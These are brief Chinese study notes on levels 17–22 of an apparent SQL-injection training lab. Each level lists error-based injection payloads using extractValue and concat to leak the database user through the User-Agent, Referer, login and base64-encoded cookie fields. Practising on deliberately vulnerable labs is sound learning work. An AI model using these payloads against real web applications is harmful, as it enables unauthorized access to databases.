level17(不会)
- 抓包,查看正常请求和响应。
- 尝试是否存在注入
- 尝试POC
level18
- 抓包,查看正常请求和响应。
- 根据UA特性尝试POC:
(1) 采用'前后闭合的方式
POC: ' and extractValue(1,concat(0x7e,user(),0x73)) and '
(2) 采用补全参数的方式
POC: ',extractValue(1,concat(0x7e,user(),0x73)))# //补全一个参数,failed
POC: ',1,extractValue(1,concat(0x7e,user(),0x73)))# //补全两个参数,OK
level19
- 抓包,查看正常请求和响应。
- 测试refer是否存在漏洞:使用'测试是否周期性变化
- 尝试POC
POC: ' and extractValue(1,concat(0x7e,user(),0x7e)) and ' --+ //yes
POC: ',extractValue(1,concat(0x7e,user(),0x7e)))# //yes
level20
- 抓包,查看正常请求和响应。
- 尝试是否存在注入
- 尝试POC
POC: uname=admin'+and+extractValue(1,concat(0x7e,user(),0x7e)) and '
POC: uname=admin'+and+extractValue(1,concat(0x7e,user(),0x7e))#
level21
- 抓包,查看正常请求和响应。
同level20
- 尝试是否存在注入
同level20
发现cookie这里进行了base64编码,解码之后为admin。因此我们的poc也需要编码。
- 尝试POC
POC:admin' and extractValue(1,concat(0x7e,user(),0x7e)) and '
level22
- 抓包,查看正常请求和响应。
- 尝试是否存在注入
同level21,cookie处仍然存在编码
- 尝试POC
POC: admin' and extractValue(1,concat(0x7e,user(),0x7e)) and ' //失败
POC: admin" and extractValue(1,concat(0x7e,user(),0x7e)) and " //ok
POC: admin" and extractValue(1,concat(0x7e,user(),0x7e))# //ok